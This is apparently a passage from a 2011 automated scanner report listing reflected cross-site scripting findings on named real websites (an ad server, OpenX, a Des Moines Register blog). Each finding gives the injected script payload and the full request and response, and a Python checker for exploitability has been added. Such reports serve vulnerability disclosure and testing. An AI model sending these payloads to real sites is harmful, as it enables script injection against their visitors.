Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/423184803/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.105. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b98"><script>alert(1)</script>b58eeecf04b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/757931301/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.106. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d6"><script>alert(1)</script>9f9e61b8a83 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x904e8d6"><script>alert(1)</script>9f9e61b8a83 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/801120019/x904e8d6"><script>alert(1)</script>9f9e61b8a83/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.107. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8223a<script>alert(1)</script>b163a0573ec was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_425158943748223a<script>alert(1)</script>b163a0573ec&pid=3a257c12-87aa-4e92-af61-e47d5422d9f7&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1419-4033&hrid=02e3d43e8047564dc7fdfdccc682e0aa-1297647245&url=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8ff.js&size_id=9&account_id=6005&site_id=12414&size=160x60
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1297527888; fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; _wc[1297527893965]=H4sIAAAAAAAAAONgYGRg0GnkYGBiYOiq5WBgZmAozGQAAHz1QNYWAAAA; i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=a5f1e488-0086-4735-aa4d-21bbfb1228f5; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1297647248; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: _wc[1297527893965]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

OXM_425158943748223a<script>alert(1)</script>b163a0573ec({"r":null});

1.108. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9f3"><script>alert(1)</script>2ae6c40c144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.109. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52d0a"%3balert(1)//c81c644a5e5 was submitted in the REST URL parameter 1. This input was echoed as 52d0a";alert(1)//c81c644a5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr52d0a"%3balert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       depends: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr52d0a";alert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatu
...[SNIP]...

1.110. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6faae"%3balert(1)//4cf314e0707 was submitted in the REST URL parameter 2. This input was echoed as 6faae";alert(1)//4cf314e0707 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.php6faae"%3balert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/index.php6faae";alert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   s
...[SNIP]...

1.111. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de38b"><script>alert(1)</script>874a658779c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.112. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks: the articleinturl property of the page-metadata object in an inline script on the article page itself (200 OK, not the error template). The payload ecfa6</script><script>alert(1)</script>3132b775423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The payload does not need to yield valid JavaScript: the HTML parser ends a script element at the first </script> it sees, regardless of JavaScript string or object-literal boundaries, so the original script block is cut short (and fails to parse) while the injected <script>alert(1)</script> element runs on its own. Any query-string parameter name triggers the reflection, so the article URL itself is the attack vector.

Request

GET /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.desmoinesregister.com/dmr/xmlrpc.php
Link: <http://blogs.desmoinesregister.com/dmr/?p=110113>; rel=shortlink
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 104095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas>


<head>
<title>Daniels at CPAC calls for
...[SNIP]...
oad, civil, conservative coalition &laquo; Des Moines Register Staff Blogs",
   type:"article",
   articleinturl: "/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1",
   categorymain:"News",
   categoryname:"News",
   categoryid:"NEWS",
   pluckpage: 0,
   url: {
       hostname: "blogs.desmoinesregister.com",
       domainname: "DesMoinesRegister.com",
       domainroot: "Des
...[SNIP]...
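A context-aware confirmation check for the two reflection shapes reported in 1.111 and 1.112, added here as an example; it is not part of the scanner report or the site's code. It takes a response body and the canary exactly as submitted, locates the reflection, decides from the surrounding markup whether it sits in a double-quoted attribute value or in a double-quoted JavaScript string, and reports whether the characters needed to leave that context survived unencoded. The response fragments are constructed from the two findings above and trimmed; the function and label names are this example's own.

```python
"""Confirm a reflected-XSS finding and classify the output context.

Added example; not part of the scanner report or the site's code.  The two
response fragments are constructed from the report's findings 1.111 and
1.112 (trimmed); the third is a constructed 'fixed' variant.  Function and
label names are this example's own.
"""
import re

# Constructed from 1.111: path segment reflected into a double-quoted
# href attribute on the 404 page.
RESP_ATTR = ('<html><head>\n<link rel="canonical" href="http://blogs.desmoinesregister.com'
             '/dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/" />\n')

# Constructed from 1.112: parameter name reflected into a double-quoted
# JavaScript string inside an inline script block.
RESP_JS = ('<script type="text/javascript">\nvar pageinfo = {\n'
           '   type:"article",\n'
           '   articleinturl: "/dmr/index.php/2011/02/11/'
           '?ecfa6</script><script>alert(1)</script>3132b775423=1",\n'
           '   categorymain:"News"\n};\n</script>\n')

# Constructed: what 1.111 would look like with attribute encoding applied.
RESP_FIXED = RESP_ATTR.replace('"><script>alert(1)</script>',
                               '&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;')

CANARY_ATTR = 'de38b"><script>alert(1)</script>874a658779c'
CANARY_JS = 'ecfa6</script><script>alert(1)</script>3132b775423'


def classify_reflection(body: str, canary: str):
    """Find `canary` in `body`; return (context, exploitable).

    context: 'html-attr-dq' (inside a double-quoted attribute value),
             'js-string-dq' (inside a double-quoted string in a <script>),
             'js-code', 'html-tag', 'html-text', or None when the canary is
             absent or was altered (e.g. HTML-encoded) before being written.
    exploitable: True when the characters needed to leave that context
             survived verbatim in the reflected canary.
    """
    pos = body.find(canary)
    if pos == -1:
        return None, False
    before = body[:pos]

    # Inside a script element if more <script ...> than </script> precede us.
    opened = len(re.findall(r'<script\b', before, re.I))
    closed = len(re.findall(r'</script\s*>', before, re.I))
    if opened > closed:
        # Quote parity on the current line says whether we sit inside a
        # double-quoted JS string (ordinary string literals cannot span lines).
        line = before.rsplit('\n', 1)[-1]
        if line.count('"') % 2 == 1:
            # Either close the string and run a statement, or end the whole
            # script element: the HTML parser stops at the first </script>.
            return 'js-string-dq', ('"' in canary or '</script>' in canary.lower())
        return 'js-code', True

    # Otherwise in markup: inside a tag if the last '<' comes after the last '>'.
    tag_start, tag_end = before.rfind('<'), before.rfind('>')
    if tag_start > tag_end:
        inside_tag = before[tag_start:]
        if inside_tag.count('"') % 2 == 1:
            return 'html-attr-dq', ('"' in canary and '>' in canary)
        return 'html-tag', ('>' in canary)
    return 'html-text', ('<' in canary)
```

Feed it the raw body of each response with the canary exactly as sent (and again with the canary percent-encoded) to separate "reflected and exploitable" from "reflected but encoded on the way out", which is the distinction the scanner's Confidence field is trying to capture.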

1.113. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 (the file name audio-player.js) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af9"><script>alert(1)</script>873102b4d8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response, in the href of the <link rel="canonical"> element of the 404 error page; only the path is reflected, the ?ver= query string is dropped.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. This is the same error-template sink as 1.111, reached through a static-asset path: nothing here is specific to the audio-player plugin, and encoding the two sinks in the error template (this href and the script object in 1.114) closes 1.111 and 1.113 to 1.127 together.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f" />
...[SNIP]...

1.114. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks: the Url property of the response object assigned to GEL.thepage.pageinfo.semantics in an inline script on the 404 error page. The payload fa9ca"%3balert(1)//678e5566e0f was submitted in the REST URL parameter 6. This input was echoed as fa9ca";alert(1)//678e5566e0f in the application's response, so this sink percent-decodes the path before writing it out (the " was sent raw, the ; as %3b).

This proof-of-concept attack demonstrates that it is possible to break out of the JavaScript string. Treat the "Certain" confidence with care for this exact payload, though: the string sits inside nested object literals (semantics={ response:{"Url":"...), so ";alert(1)// leaves both braces unclosed, the // comments out only the remainder of that line, and the script block as a whole fails to parse instead of running alert(1). The unencoded " inside a JavaScript string is a real defect regardless, and the attribute-context sibling on the same page (1.113) is the dependable proof of code execution. The same applies to the other findings that reflect into this object: 1.115, 1.117, 1.120, 1.122, 1.123 and 1.125.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca"%3balert(1)//678e5566e0f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca";alert(1)//678e5566e0f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.115. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e51"%3balert(1)//000cbdc337f was submitted in the REST URL parameter 5. This input was echoed as 33e51";alert(1)//000cbdc337f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51"%3balert(1)//000cbdc337f?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51";alert(1)//000cbdc337f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
